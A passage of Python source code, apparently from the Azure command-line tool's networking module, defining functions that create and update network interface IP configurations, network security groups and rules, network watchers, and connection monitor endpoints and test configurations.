'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
raise CLIError('Unknown operation')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
